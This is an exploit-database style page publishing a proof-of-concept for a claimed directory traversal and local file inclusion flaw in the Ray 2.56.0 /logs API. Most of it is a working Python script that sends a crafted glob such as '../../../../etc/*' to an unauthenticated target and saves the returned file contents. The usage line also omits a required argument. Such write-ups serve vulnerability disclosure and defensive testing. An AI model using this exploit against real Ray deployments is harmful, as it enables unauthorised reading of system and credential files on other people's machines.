Skip to main content

Ray 2.56.0 – Directory Traversal & Local File Inclusion

Categories: WebApps

Ray 2.56.0 – Directory Traversal & Local File Inclusion

Proof of Concept (PoC)

poc.py
# Exploit Title: Ray 2.56.0 - Directory Traversal & Local File Inclusion
# Date: 07/12/2026
# Google Dork: N/A
# Exploit Author: Richard Howe ([email protected])
# Vendor Homepage: https://github.com/ray-project/ray
# Software Link: https://github.com/ray-project/ray
# Version: 2.56.0
# Tested on: Ubuntu 22.04 and RHEL 10.0
# CVE: Pending CNA assignment


A fix has been proposed upstream and is currently under review by the
Ray maintainers.
GH Issue: https://github.com/ray-project/ray/issues/45751
GH Pull Request: https://github.com/ray-project/ray/pull/64701

This proof of concept demonstrates a directory traversal/local file
inclusion vulnerability in Ray's /logs API.
By supplying a crafted glob filter, a remote unauthenticated attacker
can access files outside the intended log directory.
The attached exploit reproduces the issue against Ray 2.56.0 on Ubuntu
22.04 and RHEL 10.0.

Attachments:

- exploit.py (proof of concept)
- Screenshot of successful exploitation
- Screenshot of the pending CVE submission


Usage:
python exploit.py 
--ip <target> 
--port 6379 
--glob ../../../../etc/*

from sys import argv
from requests import get

def get_arg(name):
    try:
        index = argv.index(name)
        return argv[index + 1]
    except (ValueError, IndexError):
        return None

def main():
    ip = get_arg("--ip")
    port = get_arg("--port")
    node_id = get_arg("--node")
    glob = get_arg("--glob")
    fpath = get_arg("--fpath")
    
    if not ip or not port or not node_id or not glob:
        print("Usage: script.py --ip <address> --port <port> --node <node id> --glob <glob> --fpath <file path>")
        exit(1)

    params = {
        'node_id': node_id,
        'glob': f'{glob}/*'
    }

    print(params)
    
    try:
        req = get(f'http://{ip}:{port}/api/v0/logs', params=params)
    except Exception as e:
        print(str(e))


    if req.status_code == 200 and fpath:
        print('Success! Writing contents to file.')
        with open(fpath, "wb") as f:
            f.write(req.content)
    elif req.status_code == 200:
        print(f'Success!n{req.content}')
    else:
        print('Failed')
        print(req.content)
        

main()

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...